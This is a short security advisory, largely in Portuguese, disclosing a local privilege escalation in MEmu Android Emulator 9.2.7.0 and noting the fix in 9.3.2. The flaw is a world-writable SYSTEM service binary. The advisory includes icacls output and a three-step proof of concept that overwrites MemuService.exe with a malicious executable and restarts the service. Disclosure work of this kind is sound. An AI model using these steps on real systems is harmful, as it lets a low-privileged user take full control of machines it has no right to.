
CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2
CVE-2026-36213 | Escalada de Privilégio Local no MEmu Android Emulator 9.2.7.0 via Permissões Inseguras de Binário de Serviço | Corrigido na versão 9.3.2
Uma vulnerabilidade de Escalada de Privilégio Local (LPE) no MEmu Android Emulator 9.2.7.0.
O serviço MEmuSVC é executado como NT AUTHORITY\SYSTEM enquanto seu binário é gravável por qualquer usuário local, permitindo comprometimento total do sistema.
| Campo | Detalhes |
|---|---|
| CVE | CVE-2026-36213 |
| Produto | MEmu Android Emulator (MicroVirt) |
| Versão Afetada | 9.2.7.0 e anteriores |
| Versão Corrigida | 9.3.2 |
| CWE | CWE-732 / CWE-269 |
| CVSS v3.1 | 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ATT&CK | T1574.010 |
MEmuService.exe é instalado como um serviço do Windows no nível SYSTEM com permissões NTFS inseguras:
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
BUILTIN\Users:(F) ← Any local user has Full Control
Everyone:(F) ← World-writable binary
:: Step 1 - Verify vulnerable permissions
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"
:: Step 2 - Replace binary (as low-priv user)
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y
:: Step 3 - Restart service
sc stop MEmuSVC && sc start MEmuSVC
:: Result: malicious.exe runs as NT AUTHORITY\SYSTEM
Disponível em: https://github.com/sec-zone/Hijack-service-binaries
Esta pesquisa foi conduzida para fins educacionais sob política de divulgação responsável.
O autor não é responsável por qualquer uso indevido destas informações.
Nome: Mohammad Hossein Ashofte Yazdi
LinkedIn: https://www.linkedin.com/in/seczone64
Twitter: @sec_zone64
E-mail: [email protected]